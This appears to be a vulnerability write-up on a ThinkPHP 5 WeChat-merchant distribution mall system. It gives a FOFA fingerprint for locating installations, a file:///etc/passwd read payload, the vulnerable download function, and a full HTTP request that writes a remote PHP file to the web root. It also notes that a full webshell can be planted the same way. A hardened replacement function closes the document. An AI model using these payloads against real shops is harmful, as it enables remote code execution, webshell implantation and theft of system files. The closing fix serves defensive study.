Notes on exploiting an RCE vulnerability
An RCE vulnerability in a WeChat-merchant (微商) agent restocking mall system
WeChat-merchant distribution agent mall: you can define your own agent tiers and upgrade conditions (such as buying specified products or reaching a spending threshold). "Micro-mall + mini-program + three-level distribution + group buying and flash sales + multi-vendor stores + O2O physical stores" spreads through social relationships, turning followers into customers and letting distributors recruit downlines, creating a new social distribution model where everyone distributes and everyone sells!
FOFA
"/template/mobile/new/static/assets/js/comm.js"
Framework: ThinkPHP 5
Payload:
/Mobile/address/curl_request?url=file:///etc/passwd
Front-end remote file write vulnerability (RCE)
The Test method in the /home/controller/Index.php controller first downloads a remote file with curl_exec and then writes it straight into a target file via fopen. The file name is fully controllable by the caller, which is what creates the vulnerability.
// Download image
public function dlfile($file_url, $save_to)
{
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_POST, 0);
    curl_setopt($ch, CURLOPT_URL, $file_url);        // URL taken directly from the request
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    $file_content = curl_exec($ch);
    curl_close($ch);
    $downloaded_file = fopen($save_to, 'w');          // destination path taken directly from the request
    fwrite($downloaded_file, $file_content);
    fclose($downloaded_file);
}
First place a file 111.txt containing <?php phpinfo();?> on a cloud server or VPS and make sure it is reachable, then substitute that address into the payload below.
Payload:
GET /home/test/dlfile?file_url=http://127.0.0.1/111.txt&save_to=1.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br, zstd
Accept-Language: zh-CN,zh;q=0.9,ru;q=0.8,en;q=0.7
Cache-Control: no-cache
Connection: keep-alive
Host: 127.0.0.1
Pragma: no-cache
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
sec-ch-ua: "Google Chrome";v="129", "Not=A?Brand";v="8", "Chromium";v="129"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
The content is written to 1.php.
Likewise, downloading a full webshell (大马) and writing it works the same way.
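The root cause of the dlfile() bug above is that both the source URL and the destination path come straight from the request. As an added example, not the vendor's code, here is how the same download helper can be written so that neither value is caller-controlled; the UPLOAD_DIR location, the size limit and the image-only allowlist are assumptions:

```php
<?php
// Added example, not the vendor's code: a hardened replacement for dlfile().
// Assumptions: files are stored under UPLOAD_DIR (assumed to exist), only http/https
// sources are fetched, and only image content is accepted; the caller never picks the path.
const UPLOAD_DIR  = __DIR__ . '/uploads';            // assumed storage directory
const MAX_BYTES   = 5 * 1024 * 1024;                 // assumed size limit
const MIME_TO_EXT = ['image/jpeg' => 'jpg', 'image/png' => 'png', 'image/gif' => 'gif'];

// Fetch $file_url and store it under UPLOAD_DIR with a server-chosen name.
// Returns the saved path; throws on any validation failure.
function dlfile_safe(string $file_url): string
{
    // 1. Only remote http/https URLs: rejects file:// (the curl_request read above)
    //    and every other scheme curl would otherwise accept.
    $scheme = strtolower((string) (parse_url($file_url, PHP_URL_SCHEME) ?? ''));
    if (!in_array($scheme, ['http', 'https'], true)) {
        throw new InvalidArgumentException('only http/https URLs are allowed');
    }

    $ch = curl_init();
    curl_setopt_array($ch, [
        CURLOPT_URL            => $file_url,
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_FOLLOWLOCATION => false,                   // no redirect to another scheme/host
        CURLOPT_PROTOCOLS      => CURLPROTO_HTTP | CURLPROTO_HTTPS,
        CURLOPT_MAXFILESIZE    => MAX_BYTES,
        CURLOPT_TIMEOUT        => 10,
    ]);
    $content = curl_exec($ch);
    $status  = curl_getinfo($ch, CURLINFO_RESPONSE_CODE);
    curl_close($ch);
    if ($content === false || $status !== 200 || strlen($content) > MAX_BYTES) {
        throw new RuntimeException('download failed');
    }

    // 2. The extension is derived from the bytes, not from the URL or a parameter,
    //    so plain "<?php ..." text is rejected before anything is written.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->buffer($content);
    if (!array_key_exists($mime, MIME_TO_EXT)) {
        throw new RuntimeException('unsupported content type: ' . $mime);
    }

    // 3. Server-generated name inside a fixed directory: no traversal, never .php.
    $save_to = UPLOAD_DIR . '/' . bin2hex(random_bytes(16)) . '.' . MIME_TO_EXT[$mime];
    if (file_put_contents($save_to, $content, LOCK_EX) === false) {
        throw new RuntimeException('write failed');
    }
    return $save_to;
}
```

The controller action then accepts only the URL; the save path and extension are never request parameters. Keeping UPLOAD_DIR outside the web root, or with PHP execution disabled for it, limits the impact should any check ever be bypassed.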